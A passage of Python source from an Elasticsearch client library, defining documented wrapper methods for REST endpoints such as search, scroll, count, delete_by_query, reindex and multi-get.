def clear_scroll(self, body=None, scroll_id=None, params=None):
"""
Explicitly clears the search context for a scroll.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-request-body.html#_clear_scroll_api>`_
:arg body: A comma-separated list of scroll IDs to clear if none
was specified via the scroll_id parameter
:arg scroll_id: A comma-separated list of scroll IDs to clear
"""
if scroll_id in SKIP_IN_PATH and body in SKIP_IN_PATH:
raise ValueError("You need to supply scroll_id or body.")
elif scroll_id and not body:
body = {"scroll_id": [scroll_id]}
elif scroll_id:
params["scroll_id"] = scroll_id
return self.transport.perform_request(
"DELETE", "/_search/scroll", params=params, body=body
)
def custom_clear_scroll(self, body):
"""
自定义的scroll删除操作
:param body:
:return:
"""
return self.transport.perform_request(
"DELETE", "/_search/scroll", params=None, body=body
)
@query_params(
"allow_no_indices",
"analyze_wildcard",
"analyzer",
"default_operator",
"df",
"expand_wildcards",
"ignore_throttled",
"ignore_unavailable",
"lenient",
"min_score",
"preference",
"q",
"routing",
"terminate_after",
)
def count(self, body=None, index=None, doc_type=None, params=None):
"""
Returns number of documents matching a query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-count.html>`_
:arg body: A query to restrict the results specified with the
Query DSL (optional)
:arg index: A comma-separated list of indices to restrict the
results
:arg doc_type: A comma-separated list of types to restrict the
results
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg analyzer: The analyzer to use for the query string
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg ignore_throttled: Whether specified concrete, expanded or
aliased indices should be ignored when throttled
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg min_score: Include only documents with a specific `_score`
value in the result
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg routing: A comma-separated list of specific routing values
:arg terminate_after: The maximum count for each shard, upon
reaching which the query execution will terminate early
"""
return self.transport.perform_request(
"POST", _make_path(index, doc_type, "_count"), params=params, body=body
)
@query_params(
"if_primary_term",
"if_seq_no",
"refresh",
"routing",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
)
def delete(self, index, id, doc_type=None, params=None):
"""
Removes a document from the index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document
:arg if_primary_term: only perform the delete operation if the
last operation that has changed the document has the specified primary
term
:arg if_seq_no: only perform the delete operation if the last
operation that has changed the document has the specified sequence
number
:arg refresh: If `true` then refresh the effected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the delete operation.
Defaults to 1, meaning the primary shard only. Set to `all` for all
shard copies, otherwise set to any non-negative value less than or equal
to the total number of copies for the shard (number of replicas + 1)
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"DELETE", _make_path(index, doc_type, id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"allow_no_indices",
"analyze_wildcard",
"conflicts",
"default_operator",
"df",
"expand_wildcards",
"from_",
"ignore_unavailable",
"lenient",
"max_docs",
"preference",
"q",
"refresh",
"request_cache",
"requests_per_second",
"routing",
"scroll",
"scroll_size",
"search_timeout",
"search_type",
"size",
"slices",
"sort",
"stats",
"terminate_after",
"timeout",
"version",
"wait_for_active_shards",
"wait_for_completion",
)
def delete_by_query(self, index, body, doc_type=None, params=None):
"""
Deletes documents matching the provided query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete-by-query.html>`_
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg body: The search definition using the Query DSL
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg conflicts: What to do when the delete by query hits version
conflicts? Valid choices: abort, proceed Default: abort
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg from_: Starting offset (default: 0)
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg max_docs: Maximum number of documents to process (default:
all documents)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg refresh: Should the effected indexes be refreshed?
:arg request_cache: Specify if request cache should be used for
this request or not, defaults to index level setting
:arg requests_per_second: The throttle for this request in sub-
requests per second. -1 means no throttle.
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg scroll_size: Size on the scroll request powering the delete
by query
:arg search_timeout: Explicit timeout for each search request.
Defaults to no timeout.
:arg search_type: Search operation type Valid choices:
query_then_fetch, dfs_query_then_fetch
:arg size: Deprecated, please use `max_docs` instead
:arg slices: The number of slices this task should be divided
into. Defaults to 1 meaning the task isn't sliced into subtasks.
Default: 1
:arg sort: A comma-separated list of <field>:<direction> pairs
:arg stats: Specific 'tag' of the request for logging and
statistical purposes
:arg terminate_after: The maximum number of documents to collect
for each shard, upon reaching which the query execution will terminate
early.
:arg timeout: Time each individual bulk request should wait for
shards that are unavailable. Default: 1m
:arg version: Specify whether to return document version as part
of a hit
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the delete by query
operation. Defaults to 1, meaning the primary shard only. Set to `all`
for all shard copies, otherwise set to any non-negative value less than
or equal to the total number of copies for the shard (number of replicas
+ 1)
:arg wait_for_completion: Should the request should block until
the delete by query is complete. Default: True
"""
# from is a reserved word so it cannot be used, use from_ instead
if "from_" in params:
params["from"] = params.pop("from_")
for param in (index, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request(
"POST",
_make_path(index, doc_type, "_delete_by_query"),
params=params,
body=body,
)
@query_params("requests_per_second")
def delete_by_query_rethrottle(self, task_id, params=None):
"""
Changes the number of requests per second for a particular Delete By Query
operation.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-delete-by-query.html>`_
:arg task_id: The task id to rethrottle
:arg requests_per_second: The throttle to set on this request in
floating sub-requests per second. -1 means set no throttle.
"""
if task_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'task_id'.")
return self.transport.perform_request(
"POST",
_make_path("_delete_by_query", task_id, "_rethrottle"),
params=params,
)
@query_params("master_timeout", "timeout")
def delete_script(self, id, params=None):
"""
Deletes a script.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html>`_
:arg id: Script ID
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
if id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'id'.")
return self.transport.perform_request(
"DELETE", _make_path("_scripts", id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"stored_fields",
"version",
"version_type",
)
def exists(self, index, id, doc_type=None, params=None):
"""
Returns information about whether a document exists in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document (use `_all` to fetch the
first document matching the ID across all types)
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"HEAD", _make_path(index, doc_type, id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"version",
"version_type",
)
def exists_source(self, index, id, doc_type=None, params=None):
"""
Returns information about whether a document source exists in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document; deprecated and optional
starting with 7.0
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request(
"HEAD", _make_path(index, doc_type, id, "_source"), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"analyze_wildcard",
"analyzer",
"default_operator",
"df",
"lenient",
"preference",
"q",
"routing",
"stored_fields",
)
def explain(self, index, id, body=None, doc_type=None, params=None):
"""
Returns information about why a specific matches (or doesn't match) a query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-explain.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg body: The query definition using the Query DSL
:arg doc_type: The type of the document
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg analyze_wildcard: Specify whether wildcards and prefix
queries in the query string query should be analyzed (default: false)
:arg analyzer: The analyzer for the query string query
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The default field for query string query (default:
_all)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET", _make_path(index, doc_type, id, "_explain"), params=params, body=body
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"fields",
"ignore_unavailable",
"include_unmapped",
)
def field_caps(self, index=None, params=None):
"""
Returns the information about the capabilities of fields among multiple
indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-field-caps.html>`_
:arg index: A comma-separated list of index names; use `_all` or
empty string to perform the operation on all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg fields: A comma-separated list of field names
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg include_unmapped: Indicates whether unmapped fields should
be included in the response.
"""
return self.transport.perform_request(
"GET", _make_path(index, "_field_caps"), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"stored_fields",
"version",
"version_type",
)
def get(self, index, id, doc_type=None, params=None):
"""
Returns a document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document (use `_all` to fetch the
first document matching the ID across all types)
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET", _make_path(index, doc_type, id), params=params
)
@query_params("master_timeout")
def get_script(self, id, params=None):
"""
Returns a script.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html>`_
:arg id: Script ID
:arg master_timeout: Specify timeout for connection to master
"""
if id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'id'.")
return self.transport.perform_request(
"GET", _make_path("_scripts", id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"version",
"version_type",
)
def get_source(self, index, id, doc_type=None, params=None):
"""
Returns the source of a document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document; deprecated and optional
starting with 7.0
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET", _make_path(index, doc_type, id, "_source"), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"stored_fields",
)
def mget(self, body, index=None, doc_type=None, params=None):
"""
Allows to get multiple documents in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-get.html>`_
:arg body: Document identifiers; can be either `docs`
(containing full document information) or `ids` (when index and type is
provided in the URL.
:arg index: The name of the index
:arg doc_type: The type of the document
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"GET", _make_path(index, doc_type, "_mget"), params=params, body=body
)
@query_params(
"ccs_minimize_roundtrips",
"max_concurrent_searches",
"max_concurrent_shard_requests",
"pre_filter_shard_size",
"rest_total_hits_as_int",
"search_type",
"typed_keys",
)
def msearch(self, body, index=None, doc_type=None, params=None):
"""
Allows to execute several search operations in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-multi-search.html>`_
:arg body: The request definitions (metadata-search request
definition pairs), separated by newlines
:arg index: A comma-separated list of index names to use as
default
:arg doc_type: A comma-separated list of document types to use
as default
:arg ccs_minimize_roundtrips: Indicates whether network round-
trips should be minimized as part of cross-cluster search requests
execution Default: true
:arg max_concurrent_searches: Controls the maximum number of
concurrent searches the multi search api will execute
:arg max_concurrent_shard_requests: The number of concurrent
shard requests each sub search executes concurrently per node. This
value should be used to limit the impact of the search on the cluster in
order to limit the number of concurrent shard requests Default: 5
:arg pre_filter_shard_size: A threshold that enforces a pre-
filter roundtrip to prefilter search shards based on query rewriting if
the number of shards the search request expands to exceeds the
threshold. This filter roundtrip can limit the number of shards
significantly if for instance a shard can not match any documents based
on it's rewrite method ie. if date filters are mandatory to match but
the shard bounds and the query are disjoint. Default: 128
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg search_type: Search operation type Valid choices:
query_then_fetch, query_and_fetch, dfs_query_then_fetch,
dfs_query_and_fetch
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
body = _bulk_body(self.transport.serializer, body)
return self.transport.perform_request(
"GET", _make_path(index, doc_type, "_msearch"), params=params, body=body
)
@query_params(
"max_concurrent_searches", "rest_total_hits_as_int", "search_type", "typed_keys"
)
def msearch_template(self, body, index=None, doc_type=None, params=None):
"""
Allows to execute several search template operations in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-multi-search.html>`_
:arg body: The request definitions (metadata-search request
definition pairs), separated by newlines
:arg index: A comma-separated list of index names to use as
default
:arg doc_type: A comma-separated list of document types to use
as default
:arg max_concurrent_searches: Controls the maximum number of
concurrent searches the multi search api will execute
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg search_type: Search operation type Valid choices:
query_then_fetch, query_and_fetch, dfs_query_then_fetch,
dfs_query_and_fetch
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
body = _bulk_body(self.transport.serializer, body)
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, "_msearch", "template"),
params=params,
body=body,
)
@query_params(
"field_statistics",
"fields",
"ids",
"offsets",
"payloads",
"positions",
"preference",
"realtime",
"routing",
"term_statistics",
"version",
"version_type",
)
def mtermvectors(self, body=None, index=None, doc_type=None, params=None):
"""
Returns multiple termvectors in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-termvectors.html>`_
:arg body: Define ids, documents, parameters or a list of
parameters per document here. You must at least provide a list of
document ids. See documentation.
:arg index: The index in which the document resides.
:arg doc_type: The type of the document.
:arg field_statistics: Specifies if document count, sum of
document frequencies and sum of total term frequencies should be
returned. Applies to all returned documents unless otherwise specified
in body "params" or "docs". Default: True
:arg fields: A comma-separated list of fields to return. Applies
to all returned documents unless otherwise specified in body "params" or
"docs".
:arg ids: A comma-separated list of documents ids. You must
define ids as parameter or set "ids" or "docs" in the request body
:arg offsets: Specifies if term offsets should be returned.
Applies to all returned documents unless otherwise specified in body
"params" or "docs". Default: True
:arg payloads: Specifies if term payloads should be returned.
Applies to all returned documents unless otherwise specified in body
"params" or "docs". Default: True
:arg positions: Specifies if term positions should be returned.
Applies to all returned documents unless otherwise specified in body
"params" or "docs". Default: True
:arg preference: Specify the node or shard the operation should
be performed on (default: random) .Applies to all returned documents
unless otherwise specified in body "params" or "docs".
:arg realtime: Specifies if requests are real-time as opposed to
near-real-time (default: true).
:arg routing: Specific routing value. Applies to all returned
documents unless otherwise specified in body "params" or "docs".
:arg term_statistics: Specifies if total term frequency and
document frequency should be returned. Applies to all returned documents
unless otherwise specified in body "params" or "docs".
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, "_mtermvectors"),
params=params,
body=body,
)
@query_params("master_timeout", "timeout")
def put_script(self, id, body, context=None, params=None):
"""
Creates or updates a script.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html>`_
:arg id: Script ID
:arg body: The document
:arg context: Script context
:arg context: Context name to compile script against
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
for param in (id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request(
"PUT", _make_path("_scripts", id, context), params=params, body=body
)
@query_params("allow_no_indices", "expand_wildcards", "ignore_unavailable")
def rank_eval(self, body, index=None, params=None):
"""
Allows to evaluate the quality of ranked search results over a set of typical
search queries
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-rank-eval.html>`_
:arg body: The ranking evaluation search definition, including
search requests, document ratings and ranking metric definition.
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"GET", _make_path(index, "_rank_eval"), params=params, body=body
)
@query_params(
"max_docs",
"refresh",
"requests_per_second",
"scroll",
"slices",
"timeout",
"wait_for_active_shards",
"wait_for_completion",
)
def reindex(self, body, params=None):
"""
Allows to copy documents from one index to another, optionally filtering the
source documents by a query, changing the destination index settings, or
fetching the documents from a remote cluster.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html>`_
:arg body: The search definition using the Query DSL and the
prototype for the index request.
:arg max_docs: Maximum number of documents to process (default:
all documents)
:arg refresh: Should the effected indexes be refreshed?
:arg requests_per_second: The throttle to set on this request in
sub-requests per second. -1 means no throttle.
:arg scroll: Control how long to keep the search context alive
Default: 5m
:arg slices: The number of slices this task should be divided
into. Defaults to 1 meaning the task isn't sliced into subtasks.
Default: 1
:arg timeout: Time each individual bulk request should wait for
shards that are unavailable. Default: 1m
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the reindex operation.
Defaults to 1, meaning the primary shard only. Set to `all` for all
shard copies, otherwise set to any non-negative value less than or equal
to the total number of copies for the shard (number of replicas + 1)
:arg wait_for_completion: Should the request should block until
the reindex is complete. Default: True
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"POST", "/_reindex", params=params, body=body
)
@query_params("requests_per_second")
def reindex_rethrottle(self, task_id, params=None):
"""
Changes the number of requests per second for a particular Reindex operation.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html>`_
:arg task_id: The task id to rethrottle
:arg requests_per_second: The throttle to set on this request in
floating sub-requests per second. -1 means set no throttle.
"""
if task_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'task_id'.")
return self.transport.perform_request(
"POST", _make_path("_reindex", task_id, "_rethrottle"), params=params
)
@query_params()
def render_search_template(self, body=None, id=None, params=None):
"""
Allows to use the Mustache language to pre-render a search definition.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html#_validating_templates>`_
:arg body: The search definition template and its params
:arg id: The id of the stored search template
"""
return self.transport.perform_request(
"GET", _make_path("_render", "template", id), params=params, body=body
)
@query_params()
def scripts_painless_execute(self, body=None, params=None):
"""
Allows an arbitrary script to be executed and a result to be returned
`<https://www.elastic.co/guide/en/elasticsearch/painless/master/painless-execute-api.html>`_
:arg body: The script to execute
"""
return self.transport.perform_request(
"GET", "/_scripts/painless/_execute", params=params, body=body
)
@query_params("rest_total_hits_as_int", "scroll")
def scroll(self, body=None, scroll_id=None, params=None):
"""
Allows to retrieve a large numbers of results from a single search request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-request-body.html#request-body-search-scroll>`_
:arg body: The scroll ID if not passed by URL or query
parameter.
:arg scroll_id: The scroll ID
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg scroll_id: The scroll ID for scrolled search
"""
if scroll_id in SKIP_IN_PATH and body in SKIP_IN_PATH:
raise ValueError("You need to supply scroll_id or body.")
elif scroll_id and not body:
body = {"scroll_id": scroll_id}
elif scroll_id:
params["scroll_id"] = scroll_id
return self.transport.perform_request(
"GET", "/_search/scroll", params=params, body=body
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"allow_no_indices",
"allow_partial_search_results",
"analyze_wildcard",
"analyzer",
"batched_reduce_size",
"ccs_minimize_roundtrips",
"default_operator",
"df",
"docvalue_fields",
"expand_wildcards",
"explain",
"from_",
"ignore_throttled",
"ignore_unavailable",
"lenient",
"max_concurrent_shard_requests",
"pre_filter_shard_size",
"preference",
"q",
"request_cache",
"rest_total_hits_as_int",
"routing",
"scroll",
"search_type",
"seq_no_primary_term",
"size",
"sort",
"stats",
"stored_fields",
"suggest_field",
"suggest_mode",
"suggest_size",
"suggest_text",
"terminate_after",
"timeout",
"track_scores",
"track_total_hits",
"typed_keys",
"version",
)
def search(self, body=None, index=None, doc_type=None, params=None):
"""
Returns results matching a query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-search.html>`_
:arg body: The search definition using the Query DSL
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg allow_partial_search_results: Indicate if an error should
be returned if there is a partial search failure or timeout Default:
True
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg analyzer: The analyzer to use for the query string
:arg batched_reduce_size: The number of shard results that
should be reduced at once on the coordinating node. This value should be
used as a protection mechanism to reduce the memory overhead per search
request if the potential number of shards in the request can be large.
Default: 512
:arg ccs_minimize_roundtrips: Indicates whether network round-
trips should be minimized as part of cross-cluster search requests
execution Default: true
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg docvalue_fields: A comma-separated list of fields to return
as the docvalue representation of a field for each hit
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg explain: Specify whether to return detailed information
about score computation as part of a hit
:arg from_: Starting offset (default: 0)
:arg ignore_throttled: Whether specified concrete, expanded or
aliased indices should be ignored when throttled
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg max_concurrent_shard_requests: The number of concurrent
shard requests per node this search executes concurrently. This value
should be used to limit the impact of the search on the cluster in order
to limit the number of concurrent shard requests Default: 5
:arg pre_filter_shard_size: A threshold that enforces a pre-
filter roundtrip to prefilter search shards based on query rewriting if
the number of shards the search request expands to exceeds the
threshold. This filter roundtrip can limit the number of shards
significantly if for instance a shard can not match any documents based
on it's rewrite method ie. if date filters are mandatory to match but
the shard bounds and the query are disjoint. Default: 128
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg request_cache: Specify if request cache should be used for
this request or not, defaults to index level setting
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg search_type: Search operation type Valid choices:
query_then_fetch, dfs_query_then_fetch
:arg seq_no_primary_term: Specify whether to return sequence
number and primary term of the last modification of each hit
:arg size: Number of hits to return (default: 10)
:arg sort: A comma-separated list of <field>:<direction> pairs
:arg stats: Specific 'tag' of the request for logging and
statistical purposes
:arg stored_fields: A comma-separated list of stored fields to
return as part of a hit
:arg suggest_field: Specify which field to use for suggestions
:arg suggest_mode: Specify suggest mode Valid choices: missing,
popular, always Default: missing
:arg suggest_size: How many suggestions to return in response
:arg suggest_text: The source text for which the suggestions
should be returned
:arg terminate_after: The maximum number of documents to collect
for each shard, upon reaching which the query execution will terminate
early.
:arg timeout: Explicit operation timeout
:arg track_scores: Whether to calculate and return scores even
if they are not used for sorting
:arg track_total_hits: Indicate if the number of documents that
match the query should be tracked
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
:arg version: Specify whether to return document version as part
of a hit
"""
# from is a reserved word so it cannot be used, use from_ instead
if "from_" in params:
params["from"] = params.pop("from_")
return self.transport.perform_request(
"GET", _make_path(index, doc_type, "_search"), params=params, body=body
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"ignore_unavailable",
"local",
"preference",
"routing",
)
def search_shards(self, index=None, params=None):
"""
Returns information about the indices and shards that a search request would be
executed against.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-shards.html>`_
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
